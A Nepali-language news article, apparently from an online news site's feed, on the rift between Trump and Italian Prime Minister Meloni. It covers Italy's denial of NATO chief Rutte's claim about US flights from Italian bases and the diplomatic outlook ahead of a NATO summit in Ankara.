ट्रम्पको टिप्पणीपछि इटालीको राजनीतिकवृत्तमा व्यापक असन्तुष्टि देखियो । राष्ट्रपति सर्जियो मट्टारेलाले मेलोनीसँग टेलिफोनमा कुरा गर्दै ऐक्यबद्धता जनाएका थिए । सरकारका मन्त्री तथा सांसदहरूले ट्रम्पको अभिव्यक्तिलाई इटालीको राष्ट्रिय सम्मानमाथिको आघात भन्दै माफी माग्न आग्रह गरे । प्रतिपक्ष दलहरूले पनि यसलाई सम्पूर्ण देशकै अपमानका रूपमा टिप्पणी गरे ।
यद्यपि, ट्रम्प आफ्नो भनाइबाट पछि हटेनन् । क्याम्प डेभिडबाट ट्रुथ सोसियलमा लेख्दै उनले मेलोनीले तस्बिरका निम्ति ‘पटक–पटक बिन्तीे गरेको’ दाबी दोहो¥याए । साथै, उनले अमेरिकाले इरानलाई सैन्य रूपमा पराजित गरेपछि मेलोनी फेरि आफूसँग नजिक हुन खोजेको आरोप लगाए ।
नेटोका महासचिवको दाबी :
विवाद केही मत्थर हुन थालेको बेला अर्को नयाँ दाबी सार्वजनिक भएपछि ट्रम्प–मेलोनी सम्बन्ध फेरि चर्चामा छ । गएको बुधबार नेटोका महासचिव मार्क रुटले फक्स न्युजसँगको अन्तर्वार्तामा इरानविरुद्ध अमेरिका–इजरायलले सञ्चालन गरेको ‘अपरेसन एपिक फ्युरी’का क्रममा इटालीस्थित आफ्ना सैन्य बेसहरूबाट करिब ५०० अमेरिकी विमानले उडान भरेको बताएका थिए ।
तर, इटालीले उक्त दाबीलाई तत्काल अस्वीकार ग¥यो । इटालीको रक्षा मन्त्रालयले रुटको भनाइलाई भ्रामक र पूर्ण रूपमा गलत भन्दै आफूहरूले केवल प्राविधिक तथा लजिस्टिक उडानका निम्ति मात्र अनुमति दिएको स्पष्ट पा¥यो ।
मेलोनीका अगाडि नयाँ चुनौती :
संविधान संशोधनसम्बन्धी जनमतसंग्रहमा हालै पराजित भएकी तथा आउँदो वर्षको निर्वाचनको तयारीमा रहेकी प्रधानमन्त्री मेलोनीका अगाडि अहिले केही महत्त्वपूर्ण चुनौती खडा भएको छ ।
पहिलो, अन्तर्राष्ट्रिय राजनीतिक मञ्चमा आफ्नो छविलाई उनले कसरी पुनस्र्थापित गर्छिन् ? दोस्रो, फ्रान्सका राष्ट्रपति इम्यानुएल म्याक्रोँसँगको सम्बन्धलाई कसरी अघि बढाउलिन् ? र, तेस्रो र सबैभन्दा ठूलो प्रश्न— के मेलोनी र ट्रम्पबीच फेरि सम्बन्ध सुधार हुन सक्ला ? भन्ने छ ।
काउन्सिल फर द युनाइटेड स्टेट्स एन्ड इटालीका उपाध्यक्ष तथा लेखक ग्यानी रियोट्टाले हालको अवस्था सुधार्न निकै कठिन देखिने बताए । यद्यपि, रोमको कूटनीतिकवृत्तमा दुवै पक्षबीचको सम्बन्ध पूर्ण रूपमा बिग्रियोस् भन्ने चाहना कसैको नभएको बताइएको छ ।
यसै साताको सुरुतिर मेलोनी सरकारका केही मन्त्रीले जुलाई २ मा हुने अमेरिकी दूतावासको स्वतन्त्रता दिवस समारोह बहिष्कार गर्न सक्ने संकेत दिएका थिए । मेलोनी स्वयं पनि उक्त कार्यक्रममा सहभागी नहुने अपेक्षा गरिएको छ । तर, अहिले त्यो आक्रोश केही मत्थर भएको देखिएको छ । विदेशमन्त्री एन्टोनियो ताजानीले आफू शिर ठाडो पारेर समारोहमा सहभागी हुने बताएका छन् ।
अब ट्रम्प र मेलोनीबीचको सम्बन्धको वास्तविक परीक्षा भने आउँदो महिनाको सुरुमा टर्कीको अंकारामा हुने नेटो शिखर सम्मेलनमा हुनेछ । जी–७ शिखर सम्मेलनपछि पहिलोपटक दुवै नेता एउटै बैठककक्षमा आमनेसामने हुने भएकाले उनीहरूबीचको सम्बन्ध कुन दिशामा अघि बढ्छ भन्नेमा अन्तर्राष्ट्रिय चासो छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49733 0